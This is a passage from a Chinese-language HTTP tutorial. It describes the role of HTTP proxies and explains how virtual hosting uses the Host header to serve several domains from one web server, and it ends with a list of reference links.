对于客户端浏览器而言,http代理服务器相当于服务器。

 

而对于Web服务器而言,http代理服务器又担当了客户端的角色。

 

3.6 虚拟主机的实现

 

3.6.1什么是虚拟主机

 

虚拟主机:是在网络服务器上划分出一定的磁盘空间供用户放置站点、应用组件等,提供必要的站点功能与数据存放、传输功能。

 

所谓虚拟主机,也叫“网站空间”就是把一台运行在互联网上的服务器划分成多个“虚拟”的服务器,每一个虚拟主机都具有独立的域名和完整的Internet服务器(支持WWW、FTP、E-mail等)功能。一台服务器上的不同虚拟主机是各自独立的,并由用户自行管理。但一台服务器主机只能够支持一定数量的虚拟主机,当超过这个数量时,用户将会感到性能急剧下降。

 

3.6.2虚拟主机的实现原理

 

虚拟主机是用同一个WEB服务器,为不同域名网站提供服务的技术。Apache、Tomcat等均可通过配置实现这个功能。

 

相关的HTTP消息头:Host。

 

例如:Host: www.baidu.com

 

客户端发送HTTP请求的时候,会携带Host头,Host头记录的是客户端输入的域名。这样服务器可以根据Host头确认客户要访问的是哪一个域名。

 

附录:参考资料

 

《理解Cookie和Session机制》:

 

http://sumongh.javaeye.com/blog/82498

 

《浅析HTTP协议》:

 

http://203.208.39.132/search?q=cache:CdXly_88gjIJ:www.cnblogs.com/gpcuster/archive/2009/05/25/1488749.html+http%E5%8D%8F%E8%AE%AE+web%E7%BC%93%E5%AD%98&cd=27&hl=zh-CN&ct=clnk&gl=cn&st_usg=ALhdy2-vzOcP8XTG1h7lcRr2GJrkTbH2Cg

 

《http代理_百度百科》:

 

http://baike.baidu.com/view/1159398.htm

 

《虚拟主机_百度百科》:

 

http://baike.baidu.com/view/7383.htm

 

《https_百度百科》:

 

http://baike.baidu.com/view/14121.htm